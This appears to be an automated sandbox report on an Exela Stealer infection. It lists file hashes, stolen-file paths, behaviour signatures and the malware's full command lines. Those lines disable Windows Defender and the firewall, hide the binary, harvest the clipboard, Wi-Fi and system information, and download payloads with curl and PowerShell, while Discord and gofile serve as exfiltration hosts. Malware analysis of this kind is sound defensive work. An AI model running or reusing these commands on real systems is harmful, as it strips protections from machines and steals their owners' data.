SHA512 954d5b6a51334eb1a602aa35f29a2c84a025438784f77d5f4c96d465cd5cf1229dd55edf1c3faa14edae5f25ed74dbc175a143d8ed93ee24f98c0fe678569031

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-heap-l1-1-0.dll

MD5 cdd1ef7807185eeee2d5ac3bae51bdd5
SHA1 441b7dcc090f6e2552b7b70c75ffeae96cf3448d
SHA256 6d14b49e8e21de08b9fa778f15c259dbd4feb9b54eb628d69bd50e5c86aa65a5
SHA512 ae57c48830cf4b0dd577e3bf5353defc9420814f340589eccfb7419d82c6459bb6a6b4163f57642407e3fc35e35f9a0a9c2ff3029e024c27e20ad20019cf0982

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-handle-l1-1-0.dll

MD5 517b80a416198dcfc9a1572625819506
SHA1 589fb8ae55c87dde75bbfc5bef4f29edb66cb44e
SHA256 2783b85d98f4a92faf67a94fc04e9c2f6786627949984828d14deab1682bbe3f
SHA512 1c7d4b693a42a14c25eb1060c8d6735e1d6d2d6db934f5f3a7dd67bd82c3be3ea3bbb6ea0b98ac1ab15e7ba393d76140012f7eaabb9d0577f965fd8b40487d4f

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l2-1-0.dll

MD5 50abf0a7ee67f00f247bada185a7661c
SHA1 0cddac9ac4db3bf10a11d4b79085ef9cb3fb84a1
SHA256 f957a4c261506484b53534a9be8931c02ec1a349b3f431a858f8215cecfec3f7
SHA512 c2694bb5d103baff1264926a04d2f0fe156b8815a23c3748412a81cc307b71a9236a0e974b5549321014065e393d10228a0f0004df9ba677f03b5d244a64b528

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l1-2-0.dll

MD5 8ad4771e23185cb7672f71ec16c580cf
SHA1 a7cd8fe0df07820296bb53700d0698f2dc042247
SHA256 b153ff5d667c8297776f21c5f440cff28c3e3a5b1f748fd4700306e1fb283ed8
SHA512 0f976083c020f683643b7ecd5fe15b3997df4c6508bf5b2f40a920ee53cd153d969c09e3207d11759a2b60bfb21adeee9ccea2d122c4ae9852ff6fed2fd88ef2

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l1-1-0.dll

MD5 bcc620dcc9a3a9dfd38663a971b7044b
SHA1 8e24ffcc313522f908b90c763c3b31debc57be84
SHA256 f73000652ca7ca7468ca6134663c99cbaf7bd97740bdbdd5d1e1e23ccfd5db75
SHA512 39a18ae66346d86b68629129856ad18d06dce8993d8133d7bd2d6b90b46825d76775ef29938c15bac88d7732d0d8db039f64ac944e45c40ece6d7ec6ae4adf10

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-fibers-l1-1-0.dll

MD5 824a1932c5c58891152ae1de02eef652
SHA1 5d864e1f6a664ebcc004b0465cf9bfb8f964d18f
SHA256 83ecd4fc05c5603621ab687657b8862175025c9910f8dc1b23135d2350dd9219
SHA512 b965b9a8e952018f243eaacc933701ac6c8fea4a5dfee55153cd54bfd8749227fb6c459852c5f4fdef509c9ba73ed81a28369dcd89818906788a57cc92e204ce

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 a538b281f8e84cecdac507c73a43d744
SHA1 8d5979e196eaeeeda5639b2a848068bfad4bd7bc
SHA256 45afaf08d1cd7e43ac5ded47ed5fd708b86e835a9470c81e8130ed6955b84db8
SHA512 edc3cf93ef5b6291aac523a0d68c7e7df4b818378b82247cf7361474df5a75a17ad87c98f49a4f7dfd7f89948fb5c11152d4065abbb0b8533af38c562fef99a1

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-debug-l1-1-0.dll

MD5 7dc2026abedaa10841eae4129ef1a9ae
SHA1 e1e48d02c970960ac50c012a5ad72e4834dd7f42
SHA256 e83d5e5eb772070999f34a214ebffcf0a6068ebc1c4b4f1991188448f323808d
SHA512 05e8431692813e831947e941e6852b70e17e26352aa4e3a0f3cedefb241caee71a907fdd4855762dfaf3122dc8fb5e9a22c27b6dfe6e4473f23685cfd3c0a5cf

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-datetime-l1-1-0.dll

MD5 1dc5b99c16502d75dd924eeda562461c
SHA1 6fe83ffc232c732cb513cecdd60d91c3d051d494
SHA256 4e08856ff5203592c27f943f5586d2214b7c5dacde1b1ef75c2316590ab788c9
SHA512 054cdadb09cf6816f1914c2607dfee9f0d56e1c9fb79ce91f84906f67c177a42036e39eec31318ac788512d8881af8a48754c5f77bac3422c4480bf019da4527

C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-console-l1-1-0.dll

MD5 1bebd9b65ed18b680f7e39bef09fe6ce
SHA1 b9dddcd699effcd6714c3cf7320d2389674bbdd7
SHA256 e756f6970905657cf73ecb3f57bae55a67be29afa75ae4d16046b0f7229708eb
SHA512 5cf255b9ffabde7713ae84278049135a64b02b0576f556d5b31bfd5091f779245f354a42a17cdbfaf14e91f856843f12ff556eb216a538592c704f41804f6172

C:\Users\Admin\AppData\Local\Temp\_MEI15562\_ctypes.pyd

MD5 b4c41a4a46e1d08206c109ce547480c7
SHA1 9588387007a49ec2304160f27376aedca5bc854d
SHA256 9925ab71a4d74ce0ccc036034d422782395dd496472bd2d7b6d617f4d6ddc1f9
SHA512 30debb8e766b430a57f3f6649eeb04eb0aad75ab50423252585db7e28a974d629eb81844a05f5cb94c1702308d3feda7a7a99cb37458e2acb8e87efc486a1d33

C:\Users\Admin\AppData\Local\Temp\_MEI15562\python3.dll

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

memory/6092-213-0x00007FFF504A0000-0x00007FFF50815000-memory.dmp

memory/6092-212-0x00007FFF503E0000-0x00007FFF50498000-memory.dmp

memory/6092-211-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp

memory/6092-210-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp

memory/6092-216-0x00007FFF62DD0000-0x00007FFF62DE2000-memory.dmp

memory/6092-215-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp

memory/6092-214-0x00007FFF62650000-0x00007FFF62674000-memory.dmp

memory/6092-218-0x00007FFF614A0000-0x00007FFF614B4000-memory.dmp

memory/6092-222-0x00007FFF5F5F0000-0x00007FFF5F60E000-memory.dmp

memory/6092-221-0x00007FFF625A0000-0x00007FFF625B9000-memory.dmp

memory/6092-220-0x00007FFF5F5D0000-0x00007FFF5F5E9000-memory.dmp

memory/6092-219-0x00007FFF4B100000-0x00007FFF4B21C000-memory.dmp

memory/6092-217-0x00007FFF62680000-0x00007FFF6269C000-memory.dmp

memory/6092-234-0x00007FFF50290000-0x00007FFF502A8000-memory.dmp

memory/6092-240-0x00007FFF63250000-0x00007FFF6325A000-memory.dmp

memory/6092-243-0x00007FFF4B340000-0x00007FFF4B358000-memory.dmp

memory/6092-242-0x00007FFF503E0000-0x00007FFF50498000-memory.dmp

memory/6092-244-0x00007FFF4A470000-0x00007FFF4AD11000-memory.dmp

memory/6092-241-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp

memory/6092-246-0x00007FFF4B300000-0x00007FFF4B337000-memory.dmp

memory/6092-245-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp

memory/6092-239-0x00007FFF4B360000-0x00007FFF4B38D000-memory.dmp

memory/6092-238-0x00007FFF50220000-0x00007FFF50231000-memory.dmp

memory/6092-237-0x00007FFF50240000-0x00007FFF50286000-memory.dmp

memory/6092-233-0x00007FFF62DF0000-0x00007FFF62E13000-memory.dmp

memory/6092-236-0x00007FFF52680000-0x00007FFF527F3000-memory.dmp

memory/6092-235-0x00007FFF504A0000-0x00007FFF50815000-memory.dmp

memory/3388-270-0x000001B1656F0000-0x000001B1656FE000-memory.dmp

memory/3388-271-0x000001B165720000-0x000001B16573A000-memory.dmp

memory/6092-328-0x00007FFF68640000-0x00007FFF6864D000-memory.dmp

memory/6092-327-0x00007FFF5F5D0000-0x00007FFF5F5E9000-memory.dmp

memory/6092-343-0x00007FFF4B360000-0x00007FFF4B38D000-memory.dmp

memory/6092-371-0x00007FFF68640000-0x00007FFF6864D000-memory.dmp

memory/6092-352-0x00007FFF52680000-0x00007FFF527F3000-memory.dmp

memory/6092-344-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp

memory/6092-364-0x00007FFF50240000-0x00007FFF50286000-memory.dmp

memory/6092-363-0x00007FFF50290000-0x00007FFF502A8000-memory.dmp

memory/6092-372-0x00007FFF4A470000-0x00007FFF4AD11000-memory.dmp

memory/6092-358-0x00007FFF62680000-0x00007FFF6269C000-memory.dmp

memory/6092-357-0x00007FFF62DD0000-0x00007FFF62DE2000-memory.dmp

memory/6092-356-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp

memory/6092-354-0x00007FFF504A0000-0x00007FFF50815000-memory.dmp

memory/6092-353-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp

memory/6092-345-0x00007FFF62650000-0x00007FFF62674000-memory.dmp

memory/4648-401-0x0000018CBC540000-0x0000018CBC548000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\BackupUnregister.ps1

MD5 6a8bebf2a16e6465218d770b28ce394d
SHA1 9cae38e3749de50c5d1ea138684718fc70573413
SHA256 d80cc4c9fb7ae3bf92b91f928a7331465cb966e8afae897771703e9c5d6ce93c
SHA512 270240732a339f7f81655e01d952dd9c5c19acf9f7af08a0b89a80218e497fd142d7cee8d90d9a9aa588e8d78b89a6ebac502c42256863501d0b19235665e41e

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UnblockRestart.jpg

MD5 e348b888683bda64447f58f3ade23d21
SHA1 7224f7bb8a8f930742390cdb1c3d047e62fb7416
SHA256 bfd8018670e5da94aece870013decd7ac03f53c3db99a4eed2771545af5c5d24
SHA512 fed41a99144a0392049e5614d53e68b63af10933028fd8457b14d3be73d12272ce0df1d29f913d005ac8c1f95e5dfdb9375f7456d870b2fbf13022599374e35b

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\PingPush.docx

MD5 d627a5380513d6972baecf93f1358713
SHA1 900a4df5fbb0171a6733a28314602c50fa70b93e
SHA256 20af230f76c44180815ae9c89efde092eab70f0d04d93c9c8f23eb6cf5d3ae37
SHA512 56fca62ccf75e9c562de46b7f2d0e35e087d9706c74c812971e9aa3ef11ad3b2757bebb8d736d29d9d03911dc2783035944a6a41ce2661a6c82a227e79fd31ba

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\FormatGroup.mp3

MD5 5951d52a110fd6b4e82d66275329583a
SHA1 210ec941af93d4c8d70cfa9627329ab3cce2ae6b
SHA256 4a53bd86afa06ef60f141745778dea32a9833faee3687340c468f93c12d9d658
SHA512 c1f3ba0ade9803e084d049a4124184e13a3bee634d23c4cf9fe022f335fd6abfd70d21f00d1d2c5c8d291e3be4617d198532d02640bd98e139614a9bfa439b13

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\ExitReceive.xlsx

MD5 70b9c07179d78343509843362d44eb11
SHA1 dffa733fa2169c072992aea9df7d15016cf1f0fa
SHA256 28cf318291213c2aa39279d8f982ca0cec1fef6dc76fc4a860323f63a64ab425
SHA512 deceaab830b4273c3d438b0079153617a6ea7912535152a1344e30f84d8bd4c0480c9d087b6abd32be4da8a43410b70ff11be4488875a1575adf324d5118b7c0

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\CopySplit.xlsx

MD5 d8886bbb87508b05717cfa91fe597531
SHA1 cdb31f6ba9f3bafb0688dd45f0e85d4119ed65ac
SHA256 8939b645941f3cc5dc07f5cd3e11c93e174e107eedebb74b1f244d70ccaf88ac
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UninstallTest.xlsx

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UnlockHide.txt

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\RepairTest.xls

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\BackupPush.vsdm

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\TestUninstall.docx

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\CompressTrace.jpg

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\RestoreUndo.docx

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\InitializeBlock.xlsx

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\GrantFormat.xlsx

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UseUnpublish.png

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\PushBlock.jpg

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\My Wallpaper.jpg

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\CheckpointWatch.jpeg

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\StepUpdate.mp3

Analysis: behavioral2

Detonation Overview

Submitted

2025-06-30 18:07

Reported

2025-06-30 18:09

Platform

win11-20250619-en

Max time kernel

100s

Max time network

104s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Contains code to disable Windows Defender

Exela Stealer

stealer exelastealer

Exelastealer family

exelastealer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A

Grants admin privileges

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A api.gofile.io N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\ARP.EXE N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

UPX packed file

upx

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

System Network Connections Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3132 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3132 wrote to memory of 248 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 3132 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\no defender.exe
PID 2512 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\no defender.exe C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 248 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 4472 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 5340 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 2936 wrote to memory of 716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5340 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4472 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 1004 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 952 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 1628 wrote to memory of 956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1992 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4472 wrote to memory of 4724 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 952 wrote to memory of 5748 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 5748 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 952 wrote to memory of 5548 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\Exela.exe

"C:\Users\Admin\AppData\Local\Temp\Exela.exe"

C:\Users\Admin\AppData\Local\Temp\no defender.exe

"C:\Users\Admin\AppData\Local\Temp\no defender.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A066.tmp\A067.tmp\A068.bat "C:\Users\Admin\AppData\Local\Temp\no defender.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$hwnd = Get-Process -id $pid | select -Expand MainWindowHandle; $win32 = Add-Type @'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); } '@ -PassThru; $win32::ShowWindow($hwnd, 0)"

C:\Users\Admin\AppData\Local\Temp\Exela.exe

"C:\Users\Admin\AppData\Local\Temp\Exela.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "gdb --version"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get Manufacturer

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Stop-Service -Name 'WinDefend' -Force"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_ComputerSystem get Manufacturer

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\cmd.exe

cmd.exe /c chcp

C:\Windows\system32\cmd.exe

cmd.exe /c chcp

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\curl.exe

curl -L --silent "بتحط هنا رابط باتشك" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\HOSTNAME.EXE

hostname

